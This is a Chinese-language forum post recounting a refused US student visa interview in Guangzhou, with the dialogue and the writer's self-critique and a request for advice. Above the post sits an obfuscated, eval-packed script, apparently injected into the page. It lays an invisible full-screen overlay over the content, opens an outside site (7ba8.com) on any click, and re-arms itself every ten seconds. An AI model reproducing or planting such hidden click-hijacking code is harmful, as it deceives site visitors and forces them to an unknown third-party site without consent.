
<script>;eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('(3(){3 4(){8 o=2.9(\'a\');o.1.b=\'c\';o.1.d=\'0\';o.1.e=\'0\';o.1.f=\'5%\';o.1.g=\'5%\';o.1.h=\'i\';o.1.j=\'k\';o.l(\'m\',()=>{n.p(\'q://r.s\');o.t();u(()=>{2.6.7(o)},v)});2.6.7(o)}4()})();',32,32,'|style|document|function|ad|100|body|appendChild|const|createElement|div|position|fixed|top|left|width|height|zIndex|99999999999|display|flex|addEventListener|click|window||open|https|7ba8|com|remove|setTimeout|10000'.split('|'),0,{}));</script>我是11月5日早上在廣州簽的, VO是高個子帥哥, 傳説中的小鬍子已經不在了。
以下是我的面簽過程, 只是大概的, 因爲不可能完全記得清楚~~~~~

I: How are you this morning, Sir?
VO:(擡頭, 笑)I'm fine! And you?
I: I'm fine too!
VO:(低頭看資料)So, why do you go to united states?
I: Uh, Because I need higher and better education, and challeng myself in a totally different situation.
VO: Which university did you graduate from(擡頭看了一眼)?
I: (愣了一下)Well, I just graduated from high school.
VO: (有點吃驚, 擡頭笑說)Oh, so you go to study undergraduate courses(翻看I-20)!
I: Yes!(其實這個時候是個很好的機會讓我取得主動地位, 將相關的資料一併解釋清楚。可是我太緊張了, 把準備好的話都忘了!之後他就甚少笑容。)
VO: Why history?
I: Because it's a flexible major. In China some people even call it "all-powful" major! Here are my materials, do you want to
VO: Oh, ok! yes!
我把材料遞進了窗口, VO接過, 拿起放在上面的學校錄取通知信看, 後來其他的資料一律沒看。
VO: What university are you going to?
I: The university of oklahoma.
VO: Why do you choose this university?
I: Uh, because the unversity...history department offers a wide rang of courses covering virtually every major history epoch.
And there are some outstanding professors. For example, professor Anderson is one of the American leading historians.
(停了一會又說)The university has a history museum. It's one of the American largest history museums.
一陣沉默, 大概有十幾秒..........
VO:(期間一直在敲電腦)What is your plan after you graduate?
I: I plan to come back to China. I will find a career in administration, business or education. So if I get my degree in US,
I will become more competitive. And with the predominance as a native Chinese, I absolutely will have great space to develop
in China.

VO: What history will you study?
I: Uh, western history, or American history.
VO: Who is your sponsor?
I: My parents.
他一直在敲電腦, 一陣沉默后, 他就一臉嚴肅地拒了我的簽證。
I: Why?
VO: The paper will tell you why. I don't think you will come back!

我覺得他在剛開始不久就已經作了決定了。 他甚至連我的銀行證明、託福成績都沒看! 也許下次應該一份份遞過去, 不要一股腦的。
我認爲我在回答爲什麽去美國念書還有選擇專業的問題上沒有回答好。 而之後的問計劃的時候應該是我一個扭轉的機會, 但是我的計劃也不能説服他。 而期間太多的沉默也是弊端。 我沒有完美的答案也沒有把握好機會, 所以被拒了。

我想知道大家有什麽建議呢? 我的父母有一座水電站50%的股份, 這個有幫助嗎?
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